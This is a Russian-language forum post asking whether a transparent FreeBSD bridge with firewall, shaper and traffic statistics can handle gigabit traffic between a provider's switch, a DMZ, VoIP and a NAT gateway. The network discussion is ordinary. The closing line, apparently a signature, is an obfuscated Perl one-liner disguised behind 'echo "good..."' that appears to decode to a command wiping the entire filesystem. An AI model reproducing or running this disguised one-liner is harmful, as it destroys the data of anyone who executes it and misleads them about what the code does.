Думаю реализовать следующую схему. От провайдера приходит по оптике две сетки 16 внешних адресов x.x.x.x/28 и специальная локалка x.x.x.x/24, все на свич провайдера, а дальше расходится что куда. При такой схеме трудно:
1. Вести учет трафа.
2. Шейпить каналы.
Что думаю сделать:
| switch prov |
x.x.x.x/28 (NET) | | x.x.x.x./24 (City LAN)
| |
| FreeBSD bridge | - 1Gbit, Ferewall, shaper, Stat
| |
| Switch LAN |
| | | |
DMZ | | VoIP (1 NET IP)
| |
| FreeBSD GW | - 1 Gbit Фаер, нат и прочее .....
|
LAN
Суть в том, что со свича провайдера надо прозрачно пропустить траф, т.е. Гейт не подходит.
Трафик по каналу x.x.x.x./24 (City LAN) + x.x.x.x/28 (NET) бешенный, 100 Мбит интерфейс нагружен под 95%, планирую гигабитные интерфейсы, сетевые карты в PCI-Exp. Сомнение все равно есть, насколько такой Bridge будет производительным. Вообще, может быть более оптимальная схема у кого есть. Аппаратный Bridge смотрел, но там нет шейпера, фаера, вобщем функционал беднее, а проф решения не укусишь по ценам, да и подготовка нужна.
echo "good..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'